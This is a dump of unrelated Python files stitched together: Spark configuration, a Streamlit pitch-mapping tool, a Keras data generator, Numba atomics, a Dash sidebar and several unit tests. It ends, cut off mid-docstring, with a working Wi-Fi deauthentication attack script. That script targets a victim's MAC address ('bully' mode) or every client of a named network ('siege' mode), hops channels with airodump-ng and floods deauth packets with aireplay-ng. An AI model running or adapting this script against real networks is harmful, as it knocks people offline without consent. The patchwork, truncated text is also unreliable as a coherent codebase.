All setter methods in this class support chaining. For example,
you can write C{conf.setMain("local").setAppName("My app")}.
Note that once a SparkConf object is passed to Spark, it is cloned
and can no longer be modified by the user.
"""
def __init__(self, loadDefaults=True, _jvm=None, _jconf=None):
"""
Create a new Spark configuration.
:param loadDefaults: whether to load values from Java system
properties (True by default)
:param _jvm: internal parameter used to pass a handle to the
Java VM; does not need to be set by users
:param _jconf: Optionally pass in an existing SparkConf handle
to use its parameters
"""
if _jconf:
self._jconf = _jconf
else:
from pyspark.context import SparkContext
SparkContext._ensure_initialized()
_jvm = _jvm or SparkContext._jvm
self._jconf = _jvm.SparkConf(loadDefaults)
def set(self, key, value):
"""Set a configuration property."""
self._jconf.set(key, unicode(value))
return self
def setIfMissing(self, key, value):
"""Set a configuration property, if not already set."""
if self.get(key) is None:
self.set(key, value)
return self
def setMain(self, value):
"""Set main URL to connect to."""
self._jconf.setMain(value)
return self
def setAppName(self, value):
"""Set application name."""
self._jconf.setAppName(value)
return self
def setSparkHome(self, value):
"""Set path where Spark is installed on worker nodes."""
self._jconf.setSparkHome(value)
return self
def setExecutorEnv(self, key=None, value=None, pairs=None):
"""Set an environment variable to be passed to executors."""
if (key is not None and pairs is not None) or (key is None and pairs is None):
raise Exception("Either pass one key-value pair or a list of pairs")
elif key is not None:
self._jconf.setExecutorEnv(key, value)
elif pairs is not None:
for (k, v) in pairs:
self._jconf.setExecutorEnv(k, v)
return self
def setAll(self, pairs):
"""
Set multiple parameters, passed as a list of key-value pairs.
:param pairs: list of key-value pairs to set
"""
for (k, v) in pairs:
self._jconf.set(k, v)
return self
def get(self, key, defaultValue=None):
"""Get the configured value for some key, or return a default otherwise."""
if defaultValue is None: # Py4J doesn't call the right get() if we pass None
if not self._jconf.contains(key):
return None
return self._jconf.get(key)
else:
return self._jconf.get(key, defaultValue)
def getAll(self):
"""Get all values as a list of key-value pairs."""
pairs = []
for elem in self._jconf.getAll():
pairs.append((elem._1(), elem._2()))
return pairs
def contains(self, key):
"""Does this configuration contain a given key?"""
return self._jconf.contains(key)
def toDebugString(self):
"""
Returns a printable version of the configuration, as a list of
key=value pairs, one per line.
"""
return self._jconf.toDebugString()
def _test():
import doctest
(failure_count, test_count) = doctest.testmod(optionflags=doctest.ELLIPSIS)
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
from .core import Node, HasInput, HasOutput, Output
class If(Node, HasInput, HasOutput):
def __init__(self, *args, **kwargs):
super(If, self).__init__(*args, **kwargs)
self._test = kwargs.get('test')
if not self._test:
raise ValueError('test not specified')
elif not hasattr(self._test, '__call__'):
raise ValueError('test must be a callable')
self.attachConnector('fail', Output)
def receiveData(self, data, from_id):
if self._test(data):
self.o.emit(data)
else:
self.fail.emit(data)
from .basic import Channel
# Waits until it receives data from every connected output, then emits the entire set at once.
class And(Channel):
def __init__(self, *args, **kwargs):
super(And, self).__init__(*args, **kwargs)
self._data_set = {}
def receiveData(self, data, from_id):
self._data_set[from_id] = data
if len(self._data_set) == len(self.i.connected):
self.o.emit(self._data_set)
self._data_set = {}
|
import streamlit as st
from streamlit_drawable_canvas import st_canvas
import pandas as pd
from PIL import Image
from helpers import calculate_homography, apply_homography_to_image, line_intersect, get_si_from_coords
from pitch import FootballPitch
from itertools import product
st.set_option('deprecation.showfileUploaderEncoding', False)
image_to_open = st.sidebar.file_uploader("Upload Image:", type=["png", "jpg"])
pitch = FootballPitch()
if image_to_open:
st.title('Pitch lines')
st.sidebar.write('Draw Penalty Box lines (options below)')
st.sidebar.image('pitch.png', width=300)
image = Image.open(image_to_open)
image = image.resize((600, int(600*image.height/image.width)))
canvas_image = st_canvas(
fill_color = "rgba(255, 165, 0, 0.3)",
stroke_width = 2,
stroke_color = '#e00',
background_image=image,
width = image.width,
height = image.height,
drawing_mode= "line",
key="canvas",
)
line_seq = ['UP','DP','RPA', 'RG']
line_options = pitch.get_lines()
lines = [st.selectbox(f'Line #{x+1}', line_options, key=f'line {x}', index=line_options.index(line_seq[x]))
for x in range(4)]
if canvas_image.json_data["objects"]:
if len(canvas_image.json_data["objects"])>=4:
df = pd.json_normalize(canvas_image.json_data["objects"])
df['line'] = lines
df['y1_line'] = df['top']+df['y1']
df['y2_line'] = df['top']+df['y2']
df['x1_line'] = df['left']+df['x1']
df['x2_line'] = df['left']+df['x2']
df['slope'], df['intercept'] = get_si_from_coords(df[['x1_line', 'y1_line', 'x2_line', 'y2_line']].values)
df = df.set_index('line')
vertical_lines = [x for x in lines if x in pitch.vert_lines]
horizontal_lines = [x for x in lines if x in pitch.horiz_lines]
intersections = {'_'.join([v, h]): line_intersect(df.loc[v, ['slope', 'intercept']], df.loc[h, ['slope', 'intercept']])
for v,h in product(vertical_lines, horizontal_lines)}
pts_src = list(intersections.values())
pts_dst = [pitch.get_intersections()[x] for x in intersections]
h,out = calculate_homography(pts_src, pts_dst)
h_image = apply_homography_to_image(h, image)
st.title('Players')
team_color = st.selectbox("Team color: ", ['red', 'blue'])
if team_color == 'red':
stroke_color='#e00'
else:
stroke_color='#00e'
edit = st.checkbox('Edit mode (move selection boxes)')
update = st.button('Update data')
canvas_converted = st_canvas(
fill_color = "rgba(255, 165, 0, 0.3)", # Fixed fill color with some opacity
stroke_width = 2,
stroke_color = stroke_color,
background_image=Image.fromarray(h_image),
drawing_mode= "transform" if edit else "rect",
update_streamlit=update,
height=340,
width=525,
key="canvas2",
)
if canvas_converted.json_data["objects"]:
if len(canvas_converted.json_data["objects"])>0:
dfCoords = pd.json_normalize(canvas_converted.json_data["objects"])
dfCoords['y'] = (dfCoords['top']+dfCoords['height']*dfCoords['scaleY'])/340*100 #not working - how to get the center of circle?
dfCoords['x'] = (dfCoords['left']+dfCoords['width']*dfCoords['scaleX'])/525*100
dfCoords['team'] = dfCoords.apply(lambda x: 'red' if x['stroke']=='#e00' else 'blue', axis=1)
st.dataframe(dfCoords[['team', 'x', 'y']])
if st.button('Save to disk'):
dfCoords[['team', 'x', 'y']].to_csv('output.csv')
st.info('Saved as output.csv')
|
import logging
from ibmsecurity.utilities import tools
logger = logging.getLogger(__name__)
uri = "/isam/dsc/config"
requires_modules = None
requires_version = None
requires_model = "Docker"
def get(isamAppliance, check_mode=False, force=False):
"""
Retrieve the current distributed session cache policy
"""
return isamAppliance.invoke_get("Retrieve the current distributed session cache policy", uri,
requires_modules=requires_modules, requires_version=requires_version,
requires_model=requires_model)
def set(isamAppliance, service_port=443, replication_port=444, worker_threads=64, max_session_lifetime=3600,
client_grace=600, servers=[], check_mode=False, force=False):
"""
Update the current distributed session cache policy
"""
# Create a simple json with just the main client attributes
dsc_json = {
"worker_threads": worker_threads,
"max_session_lifetime": max_session_lifetime,
"client_grace": client_grace,
"service_port": service_port,
"replication_port": replication_port,
"servers": servers
}
obj = _check(isamAppliance, dsc_json)
if force is True or obj['value'] is False:
if check_mode is True:
return isamAppliance.create_return_object(changed=True, warnings=obj['warnings'])
else:
return isamAppliance.invoke_put("Update the current distributed session cache policy", uri, dsc_json,
requires_modules=requires_modules, requires_version=requires_version,
requires_model=requires_model, warnings=obj['warnings'])
return isamAppliance.create_return_object(warnings=obj['warnings'])
def _check(isamAppliance, cluster_json):
"""
Check if provided json values match the configuration on appliance
:param isamAppliance:
:param cluster_json:
:return:
"""
obj = {"value": False, "warnings": ""}
ret_obj = get(isamAppliance)
sorted_ret_obj = tools.json_sort(ret_obj['data'])
sorted_json_data = tools.json_sort(cluster_json)
logger.debug("Sorted Existing Data:{0}".format(sorted_ret_obj))
logger.debug("Sorted Desired Data:{0}".format(sorted_json_data))
if sorted_ret_obj != sorted_json_data:
logger.info("Existing and input data do not match - updated needed.")
obj['value'] = False
obj['warnings'] = ret_obj['warnings']
return obj
else:
obj['value'] = True
obj['warnings'] = ret_obj['warnings']
return obj
def compare(isamAppliance1, isamAppliance2):
"""
Compare DSC configuration between two appliances
"""
ret_obj1 = get(isamAppliance1)
ret_obj2 = get(isamAppliance2)
return tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
|
import copy
import random
import keras
import numpy as np
from keras2vec.encoder import Encoder
# TODO: Implement as a keras.utils.Sequence class
class DataGenerator(keras.utils.Sequence):
"""The DataGenerator class is used to encode documents and generate training/testing
data for a Keras2Vec instance. Currently this object is only used internally within the
Keras2Vec class and not intended for direct use.
Args:
documents (:obj:`list` of :obj:`Document`): List of documents to vectorize
"""
def __init__(self, documents, seq_size, neg_samples, batch_size=100, shuffle=True, val_gen=False):
self.doc_vocab = self.label_vocab = self.text_vocab = None
self.doc_enc = self.label_enc = self.text_enc = None
self.neg_samples = neg_samples
self.seq_size = seq_size
self.batch_size = batch_size
self.shuffle = shuffle
self.val_gen = val_gen
# TODO: Change the documents attribute to encoded documents
[doc.gen_windows(seq_size) for doc in documents]
self.documents = documents
self.build_vocabs()
self.create_encodings()
if val_gen:
tmp_indexes = list(range(len(self.documents)))
np.random.shuffle(tmp_indexes)
self.indexes = tmp_indexes[:self.batch_size]
else:
self.indexes = list(range(len(self.documents)))
def build_vocabs(self):
"""Build the vocabularies for the document ids, labels, and text of
the provided documents"""
doc_vocab = set()
label_vocab = set()
text_vocab = set([''])
for doc in self.documents:
doc_vocab.add(doc.doc_id)
label_vocab.update(doc.labels)
text_vocab.update(doc.text)
self.doc_vocab = doc_vocab
self.label_vocab = label_vocab
self.text_vocab = text_vocab
def create_encodings(self):
"""Build the encodings for each of the provided data types"""
self.doc_enc = Encoder(self.doc_vocab)
self.label_enc = Encoder(self.label_vocab)
self.text_enc = Encoder(self.text_vocab)
def get_infer_generator(self, infer_doc):
infer_gen = copy.deepcopy(self)
infer_doc.gen_windows(self.seq_size)
infer_gen.doc_vocab = set([0])
infer_gen.documents = [infer_doc]
infer_gen.batch_size = 1
infer_gen.indexes = list(range(len(infer_gen.documents)))
return infer_gen
# TODO: Replace with generator
def neg_sampling(self, window):
neg_samples = []
win_ix = int((self.seq_size - 1) / 2)
center_word = window[win_ix]
word_dict = self.text_vocab.copy()
word_dict.remove(center_word)
dict_len = len(word_dict)
for ix in range(self.neg_samples):
if len(word_dict) < 1:
break
rep_word = random.sample(word_dict, 1)[0]
word_dict.remove(rep_word)
new_win = window.copy()
new_win[win_ix] = rep_word
neg_samples.append(new_win)
return neg_samples
def encode_doc(self, doc, neg_sampling=False, num_neg_samps=3):
"""Encodes a document for the keras model
Args:
doc(Document): The document to encode
neg_sampling(Boolean): Whether or not to generate negative samples for the document
**NOTE**: Currently not implemented"""
docs = []
labels = []
words = []
outputs = []
enc_doc = self.doc_enc.transform(doc.doc_id)
enc_labels = [self.label_enc.transform(lbl) for lbl in doc.labels]
for window in doc.windows:
for label in enc_labels:
enc_words = [self.text_enc.transform(word) for word in window]
docs.append(enc_doc)
labels.append([label])
words.append(enc_words)
outputs.append(1)
if self.neg_samples > 0:
for neg_samp in self.neg_sampling(window):
for label in enc_labels:
enc_words = [self.text_enc.transform(word) for word in neg_samp]
docs.append(enc_doc)
labels.append([label])
words.append(enc_words)
outputs.append(0)
ret = (np.vstack(docs),
labels,
words,
np.vstack(outputs))
return ret
def __len__(self):
"""Denotes the number of batches per epoch"""
if self.val_gen:
return 1
return int(len(self.documents)/self.batch_size)
def __getitem__(self, index):
indexes = self.indexes[index * self.batch_size:(index + 1) * self.batch_size]
docs = [self.documents[ix] for ix in indexes]
inputs, outputs = self.__data_generation(docs)
return inputs, outputs
def on_epoch_end(self):
'Updates indexes after each epoch'
if self.val_gen:
tmp_indexes = list(range(len(self.documents)))
np.random.shuffle(tmp_indexes)
self.indexes = tmp_indexes[:self.batch_size]
elif self.shuffle == True:
np.random.shuffle(self.indexes)
def __data_generation(self, docs):
"""Generates a single epoch of encoded data for the keras model"""
batch_docs = []
batch_labels = []
batch_words = []
batch_outputs = []
for doc in docs:
enc_doc, enc_labels, enc_words, outputs = self.encode_doc(doc)
batch_docs.append(enc_doc)
batch_labels.append(np.array(enc_labels))
batch_words.extend(enc_words)
batch_outputs.append(outputs)
if len(self.label_vocab) > 0:
inputs = [np.vstack(batch_docs),
np.vstack(batch_labels),
np.vstack(batch_words)]
else:
inputs = [np.vstack(batch_docs), np.vstack(batch_words)]
outputs = np.vstack(batch_outputs)
return inputs, outputs
|
import csv
# csvfile 可以是具有 write() 方法的任何对象,如果 csvfile 是文件对象,则使用 newline='' 打开
with open('test.csv', 'w', newline='') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(['id', 'name', 'age'])
# writer.writerow(['1001', '张三', '222'])
# 写入多行
data = [('1001', '张三', '21'), ('1002', '李四', '31')]
writer.writerows(data)
|
""" Temporary directory fixtures
"""
from __future__ import absolute_import
import os
import tempfile
import shutil
import logging
import subprocess
try:
from path import Path
except ImportError:
from path import path as Path
import pytest
from six import string_types
from . import cmdline
log = logging.getLogger(__name__)
@pytest.fixture()
def workspace():
""" Function-scoped temporary workspace that cleans up on exit.
Attributes
----------
workspace (`path.path`): Path to the workspace directory.
debug (bool): If set to True, will log more debug when running commands.
delete (bool): If True, will always delete the workspace on teardown;
.. If None, delete the workspace unless teardown occurs via an exception;
.. If False, never delete the workspace on teardown.
"""
ws = Workspace()
yield ws
ws.teardown()
class Workspace(object):
"""
Creates a temp workspace, cleans up on teardown. Can also be used as a context manager.
Has a 'run' method to execute commands relative to this directory.
"""
debug = False
delete = True
def __init__(self, workspace=None, delete=None):
self.delete = delete
log.debug("")
log.debug("=======================================================")
if workspace is None:
self.workspace = Path(tempfile.mkdtemp(dir=self.get_base_tempdir()))
log.debug("pytest_shutil created workspace %s" % self.workspace)
else:
self.workspace = Path(workspace)
log.debug("pytest_shutil using workspace %s" % self.workspace)
if 'DEBUG' in os.environ:
self.debug = True
if self.delete is not False:
log.debug("This workspace will delete itself on teardown")
log.debug("=======================================================")
log.debug("")
def __enter__(self):
return self
def __exit__(self, errtype, value, traceback): # @UnusedVariable
if self.delete is None:
self.delete = (errtype is None)
self.teardown()
def __del__(self):
self.teardown()
@staticmethod
def get_base_tempdir():
""" Returns an appropriate dir to pass into
tempfile.mkdtemp(dir=xxx) or similar.
"""
# Prefer CI server workspaces. TODO: look for env vars for other CI servers
return os.getenv('WORKSPACE')
def run(self, cmd, capture=False, check_rc=True, cd=None, shell=False, **kwargs):
"""
Run a command relative to a given directory, defaulting to the workspace root
Parameters
----------
cmd : `str` or `list`
Command string or list. Commands given as a string will be run in a subshell.
capture : `bool`
Capture and return output
check_rc : `bool`
Assert return code is zero
cd : `str`
Path to chdir to, defaults to workspace root
"""
if isinstance(cmd, string_types):
shell = True
else:
# Some of the command components might be path objects or numbers
cmd = [str(i) for i in cmd]
if not cd:
cd = self.workspace
with cmdline.chdir(cd):
log.debug("run: {0}".format(cmd))
if capture:
p = subprocess.Popen(cmd, shell=shell, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kwargs)
else:
p = subprocess.Popen(cmd, shell=shell, **kwargs)
(out, _) = p.communicate()
if out is not None and not isinstance(out, string_types):
out = out.decode('utf-8')
if self.debug and capture:
log.debug("Stdout/stderr:")
log.debug(out)
if check_rc and p.returncode != 0:
err = subprocess.CalledProcessError(p.returncode, cmd)
err.output = out
if capture and not self.debug:
log.error("Stdout/stderr:")
log.error(out)
raise err
return out
def teardown(self):
if self.delete is not None and not self.delete:
return
if self.workspace.isdir():
log.debug("")
log.debug("=======================================================")
log.debug("pytest_shutil deleting workspace %s" % self.workspace)
log.debug("=======================================================")
log.debug("")
shutil.rmtree(self.workspace, ignore_errors=True)
|
from numba import types
from numba.core import cgutils
from numba.core.typing.arraydecl import get_array_index_type
from numba.extending import lower_builtin, type_callable
from numba.np.arrayobj import make_array, normalize_indices, basic_indexing
__all__ = ["atomic_add", "atomic_sub", "atomic_max", "atomic_min"]
def atomic_rmw(context, builder, op, arrayty, val, ptr):
assert arrayty.aligned # We probably have to have aligned arrays.
dataval = context.get_value_as_data(builder, arrayty.dtype, val)
return builder.atomic_rmw(op, ptr, dataval, "monotonic")
def declare_atomic_array_op(iop, uop, fop):
def decorator(func):
@type_callable(func)
def func_type(context):
def typer(ary, idx, val):
out = get_array_index_type(ary, idx)
if out is not None:
res = out.result
if context.can_convert(val, res):
return res
return typer
@lower_builtin(func, types.Buffer, types.Any, types.Any)
def func_impl(context, builder, sig, args):
"""
array[a] = scalar_or_array
array[a,..,b] = scalar_or_array
"""
aryty, idxty, valty = sig.args
ary, idx, val = args
if isinstance(idxty, types.BaseTuple):
index_types = idxty.types
indices = cgutils.unpack_tuple(builder, idx, count=len(idxty))
else:
index_types = (idxty,)
indices = (idx,)
ary = make_array(aryty)(context, builder, ary)
# First try basic indexing to see if a single array location is denoted.
index_types, indices = normalize_indices(context, builder, index_types, indices)
dataptr, shapes, _strides = basic_indexing(
context, builder, aryty, ary, index_types, indices, boundscheck=context.enable_boundscheck,
)
if shapes:
raise NotImplementedError("Complex shapes are not supported")
# Store source value the given location
val = context.cast(builder, val, valty, aryty.dtype)
op = None
if isinstance(aryty.dtype, types.Integer) and aryty.dtype.signed:
op = iop
elif isinstance(aryty.dtype, types.Integer) and not aryty.dtype.signed:
op = uop
elif isinstance(aryty.dtype, types.Float):
op = fop
if op is None:
raise TypeError("Atomic operation not supported on " + str(aryty))
return atomic_rmw(context, builder, op, aryty, val, dataptr)
return func
return decorator
@declare_atomic_array_op("add", "add", "fadd")
def atomic_add(ary, i, v):
"""
Atomically, perform `ary[i] += v` and return the previous value of `ary[i]`.
i must be a simple index for a single element of ary. Broadcasting and vector operations are not supported.
This should be used from numba compiled code.
"""
orig = ary[i]
ary[i] += v
return orig
@declare_atomic_array_op("sub", "sub", "fsub")
def atomic_sub(ary, i, v):
"""
Atomically, perform `ary[i] -= v` and return the previous value of `ary[i]`.
i must be a simple index for a single element of ary. Broadcasting and vector operations are not supported.
This should be used from numba compiled code.
"""
orig = ary[i]
ary[i] -= v
return orig
@declare_atomic_array_op("max", "umax", None)
def atomic_max(ary, i, v):
"""
Atomically, perform `ary[i] = max(ary[i], v)` and return the previous value of `ary[i]`.
This operation does not support floating-point values.
i must be a simple index for a single element of ary. Broadcasting and vector operations are not supported.
This should be used from numba compiled code.
"""
orig = ary[i]
ary[i] = max(ary[i], v)
return orig
@declare_atomic_array_op("min", "umin", None)
def atomic_min(ary, i, v):
"""
Atomically, perform `ary[i] = min(ary[i], v)` and return the previous value of `ary[i]`.
This operation does not support floating-point values.
i must be a simple index for a single element of ary. Broadcasting and vector operations are not supported.
This should be used from numba compiled code.
"""
orig = ary[i]
ary[i] = min(ary[i], v)
return orig
|
from pydoc import classname
import dash_bootstrap_components as dbc
from dash import dcc, html
import globals
from datetime import date
from dash_extensions.enrich import Input, Output, State, ServersideOutput, dcc
def sidebar():
sidebar = html.Div(
children=[
dbc.Row(
dbc.Label('Campaign:', className='label h3'),
),
# dbc.Row(
# dcc.Dropdown(
# id='campaign-dropdown',
# multi=False,
# options=[
# {'label': i, 'value': i} for i in globals.campaigns_rename
# ],
# placeholder="Campaign",
# value='CRYSTAL FACE (UND)',
# className='h4',
# ),
# ),
dbc.Row(
dbc.Label('Particle Type:', className='label h3'),
),
dbc.Row(
dcc.Dropdown(
id='part-type-dropdown',
multi=True,
options=[
{'label': i, 'value': i} for i in globals.particle_types_rename
],
placeholder="Particle Type",
value=globals.particle_types_rename,
className='h4',
),
),
dbc.Row(
dbc.Label('Particle Property:', className='label h3'),
),
dbc.Row(
dcc.Dropdown(
id='property-dropdown',
options=[
{'label': i, 'value': i} for i in globals.particle_properties
],
placeholder="Particle Property",
value='Complexity',
className='h4',
),
),
dbc.Row(
dbc.Label('Environmental Variable:', className='label h3'),
),
dbc.Row(
dcc.Dropdown(
id='env-dropdown',
options=[{'label': i, 'value': i} for i in globals.env_properties],
placeholder="Environmental Variable",
value='Ice Water Content',
className='h4',
),
),
dbc.Row(
dbc.Label('Date:', className='label h3'),
),
dbc.Row(
dcc.DatePickerRange(
id='date-picker',
start_date=date(2002, 7, 19),
end_date=date(2002, 7, 23),
month_format='MMM Do, YY',
display_format='MMM Do, YY',
),
),
dbc.Row(
dbc.Label('Temperature Range [C]:', className='label h3'),
),
dbc.Row(
dcc.Input(
type='text',
placeholder='min [C], e.g., -70',
id='min-temp',
value=-70,
),
className='p-1',
align="center",
),
dbc.Row(
dcc.Input(
type='text',
placeholder='max [C], e.g., 20',
id='max-temp',
value=40,
),
className='p-1',
align="center",
),
dbc.Row(
dbc.Label('Pressure Maximum:', className='label h3'),
),
html.Div(
dcc.RangeSlider(
id='max-pres',
min=400,
max=1000,
value=[1000],
allowCross=False,
marks={
400: {'label': '400hPa'},
600: {'label': '600hPa'},
800: {'label': '800hPa'},
1000: {'label': '1000hPa'},
},
),
className='p-1',
),
dbc.Row(
dbc.Label('Pressure Minimum:', className='label h3'),
),
html.Div(
dcc.RangeSlider(
id='min-pres',
min=100,
max=400,
value=[100],
allowCross=False,
marks={
400: {'label': '400hPa'},
300: {'label': '300hPa'},
200: {'label': '200hPa'},
100: {'label': '100hPa'},
},
),
className='p-1',
),
dbc.Row(
dbc.Label('Particle Size [micrometers]:', className='label h3'),
),
dbc.Row(
dcc.Input(
type='text',
placeholder='min, e.g., 100',
id='min-size',
value=30,
),
className='p-1',
align="center",
),
dbc.Row(
dcc.Input(
type='text',
placeholder='max, e.g., 2000',
id='max-size',
value=3000,
),
className='p-1',
align="center",
),
dbc.Row(
html.Button(
id='submit-button',
n_clicks=0,
children='Apply Filters',
className='btn btn-primary white btn-lg m-auto my-1',
),
),
dcc.Download(id="download-df-csv"),
dbc.Row(
html.Button(
id='download-button',
n_clicks=0,
children='Download Data',
className='btn btn-primary white btn-lg m-auto my-1',
),
),
],
id='sidebar',
className='position-fixed bottom-0 left-0 overflow-y-scroll',
)
return sidebar
|
#!/usr/bin/env python
import unittest
import lief
import tempfile
import sys
import subprocess
import stat
import os
import logging
import random
import itertools
from lief import Logger
Logger.set_level(lief.LOGGING_LEVEL.WARNING)
from unittest import TestCase
from utils import get_sample
class TestBuilder(TestCase):
def setUp(self):
self.logger = logging.getLogger(__name__)
def test_simple(self):
binall = lief.parse(get_sample('ELF/ELF32_x86_binary_all.bin'))
def test_sectionless(self):
binall = lief.parse(get_sample('ELF/ELF64_x86-64_binary_rvs.bin'))
def test_library(self):
binall = lief.parse(get_sample('ELF/ELF64_x86-64_library_libadd.so'))
def test_object(self):
binall = lief.parse(get_sample('ELF/ELF64_x86-64_object_builder.o'))
def test_android(self):
binall = lief.parse(get_sample('ELF/ELF64_AArch64_piebinary_ndkr16.bin'))
def test_corrupted(self):
binall = lief.parse(get_sample('ELF/ELF32_x86_library_libshellx.so'))
def test_gcc(self):
binall = lief.parse(get_sample('ELF/ELF32_x86_binary_gcc.bin'))
if __name__ == '__main__':
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
root_logger.addHandler(ch)
unittest.main(verbosity=2)
|
import unittest
from overtime.components.digraphs import TemporalDiGraph
from overtime.algorithms.paths.optimality import *
class OptimalityTest(unittest.TestCase):
"""
Tests functions which find optimal path metrics in temporal directed graphs.
"""
def setUp(self):
"""
Create a graph for use in all test methods.
"""
self.network1 = TemporalDiGraph("test_network")
for node in ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"]:
self.network1.add_node(node)
edges = {
0: {'node1': 'a', 'node2': 'e', 'tstart': 1, 'tend': 2},
1: {'node1': 'e', 'node2': 'f', 'tstart': 2, 'tend': 3},
2: {'node1': 'g', 'node2': 'e', 'tstart': 3, 'tend': 4},
3: {'node1': 'h', 'node2': 'b', 'tstart': 4, 'tend': 5},
4: {'node1': 'h', 'node2': 'i', 'tstart': 5, 'tend': 6},
5: {'node1': 'e', 'node2': 'h', 'tstart': 6, 'tend': 7},
6: {'node1': 'c', 'node2': 'h', 'tstart': 7, 'tend': 8},
7: {'node1': 'j', 'node2': 'h', 'tstart': 7, 'tend': 8},
8: {'node1': 'd', 'node2': 'c', 'tstart': 8, 'tend': 9},
9: {'node1': 'h', 'node2': 'i', 'tstart': 9, 'tend': 10},
10: {'node1': 'h', 'node2': 'i', 'tstart': 10, 'tend': 11},
11: {'node1': 'a', 'node2': 'e', 'tstart': 11, 'tend': 12},
12: {'node1': 'h', 'node2': 'b', 'tstart': 12, 'tend': 13},
13: {'node1': 'a', 'node2': 'c', 'tstart': 12, 'tend': 13}
}
for index, edge in edges.items():
self.network1.add_edge(edge['node1'], edge['node2'], edge['tstart'], edge['tend'])
def test_calculate_fastest_path_durations(self):
"""
Tests that calculate_fastest_path_durations returns known correct values for several dummy networks.
"""
output_a = calculate_fastest_path_durations(self.network1, "a")
output_e = calculate_fastest_path_durations(self.network1, "e")
output_j = calculate_fastest_path_durations(self.network1, "j")
correct_a = {'d': float('inf'), 'h': 6, 'c': 1, 'g': float('inf'), 'j': float('inf'), 'a': 0, 'e': 1, 'i': 9, 'f': 2, 'b': 12}
correct_e = {'d': float('inf'), 'h': 1, 'c': float('inf'), 'g': float('inf'), 'j': float('inf'), 'a': float('inf'), 'e': 0, 'i': 4, 'f': 1, 'b': 7}
correct_j = {'d': float('inf'), 'h': 1, 'c': float('inf'), 'g': float('inf'), 'j': 0, 'a': float('inf'), 'e': float('inf'), 'i': 3, 'f': float('inf'), 'b': 6}
self.assertEqual(output_a, correct_a)
self.assertEqual(output_e, correct_e)
self.assertEqual(output_j, correct_j)
def test_calculate_shortest_path_lengths(self):
"""
Tests that calculate_shortest_path_lengths returns known correct values for several dummy networks.
- TemporalGraph
- 1 - 2 networks
- TemporalDiGraph
- 1 - 2 networks
-
"""
output_a = calculate_shortest_path_lengths(self.network1, "a")
output_e = calculate_shortest_path_lengths(self.network1, "e")
output_j = calculate_shortest_path_lengths(self.network1, "j")
correct_a = {'j': float('inf'), 'd':float('inf'), 'f': 2, 'c': 1, 'g': float('inf'), 'i': 3, 'b': 3, 'h': 2, 'e': 1, 'a': 0}
correct_e = {'j': float('inf'), 'd': float('inf'), 'f': 1, 'c': float('inf'), 'g': float('inf'), 'i': 2, 'b': 2, 'h': 1, 'e': 0, 'a': float('inf')}
correct_j = {'j': 0, 'd': float('inf'), 'f': float('inf'), 'c': float('inf'), 'g': float('inf'), 'i': 2, 'b': 2, 'h': 1, 'e': float('inf'), 'a': float('inf')}
self.assertEqual(output_a, correct_a)
self.assertEqual(output_e, correct_e)
self.assertEqual(output_j, correct_j)
|
import compas
from compas.datastructures import Mesh
from compas_plotters import MeshPlotter
mesh = Mesh.from_obj(compas.get('faces.obj'))
plotter = MeshPlotter(mesh, figsize=(12, 7.5))
plotter.draw_vertices(text={vertex: str(mesh.vertex_degree(vertex)) for vertex in mesh.vertices()}, radius=0.2)
plotter.draw_faces()
plotter.show()
|
import os
from datetime import datetime
import time
import subprocess
LAST_CHANNEL = float("inf")
def get_bully_attack_list(d, victim):
l = {}
for channel in d[victim]["channels"]:
if not channel in l:
l[channel] = []
for bssid in d[victim]["channels"][channel]:
l[channel].append({"client_mac":victim, "ap_mac":bssid})
return l
def get_siege_attack_list(d, essid, clients):
# list of dictionaries to make it easy to change channels
l = {}
for channel in d[essid]:
if channel not in l:
l[channel] = []
for ap_mac in d[essid][channel]:
for client_mac in d[essid][channel][ap_mac]:
if len(client_mac) == 0 or client_mac in clients:
l[channel].append({"client_mac":client_mac, "ap_mac":ap_mac})
return l
def hop_to_channel(c, adapter="wlan0mon"):
return subprocess.Popen(["airodump-ng", adapter,"-c",str(c)],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE)
def begin_attack(
dict1,
dict2,
mode="bully",
victims_mac = None,
net_clients = None,
ESSID = None,
attack_time = 10,
wireless_adapter = "wlan0mon"
):
"""
:param dict1: essid dict data
:param dict2: inverted index
:param mode: defaults to bully mode, otherwise indicate "siege"
:param victims_mac: must be a string with the mac address to be bullied
and passed by name if bully mode
:param ESSID: must be a string with the identifier of a network
:param net_clients: optional list of clients in ESSID network clients
passing an empty list indicates attack all
:param attack_time: attack length duration in seconds, defaults to 180
:return: 1/0
"""
global LAST_CHANNEL
attack_list = []
channels = []
if mode == "bully":
assert net_clients is None
assert ESSID is None
assert not dict2 is None
attack_list = get_bully_attack_list(dict2,victims_mac)
else:
assert victims_mac is None
assert not dict1 is None
attack_list = get_siege_attack_list(dict1, ESSID, net_clients)
CURR_TIME = datetime.now()
TIME_DIFF = 0
import json
i = 0
channels = list(attack_list.keys())
LAST_CHANNEL = channels[0]
channel = channels[0]
airodump = hop_to_channel(channel,wireless_adapter)
while (datetime.now()-CURR_TIME).total_seconds() < attack_time:
channel = channels[i]
if not channel == LAST_CHANNEL:
airodump.kill()
time.sleep(.1)
print ("last channel:",LAST_CHANNEL,"new channel:", channel)
LAST_CHANNEL = channel
airodump = hop_to_channel(channel,wireless_adapter)
time.sleep(.1)
attack_clients(attack_list[channel], 1, wireless_adapter, list_cycles=4, time_between_cycles=0 )
i = (i + 1) % len(channels) - 1
return 0
def de_auth_client( client_mac,
access_point_mac,
deauths=1,
adapter="wlan0mon"):
"""
:param client_mac:
:param access_point_mac:
:param deauths: number of de-authentications (128 packets to router and client per deauth)
:param adapter:
:return:
r = os.system("aireplay-ng " + "-0 " + str(deauths) + " -a " + str(access_point_mac) \
+ " -c " + client_mac + " " + adapter)
"""
print (client_mac)
r2 = subprocess.call(["aireplay-ng", "-0", str(deauths), "-a", str(access_point_mac),\
"-c", client_mac, adapter], stderr=subprocess.PIPE, stdout=subprocess.PIPE)
#stdout, stderr = r2.communicate()
#return r
def attack_clients(attack_dict,
de_auths_per_client,
adapter,
timeout=60,
list_cycles=100,
time_between_cycles=1
):
"""
:param clients_dict: a dictionary of clients with (at least) client_mac, ap_mac. keys
:param de_auths_per_client: (int) doesn't necessarily have to be large if
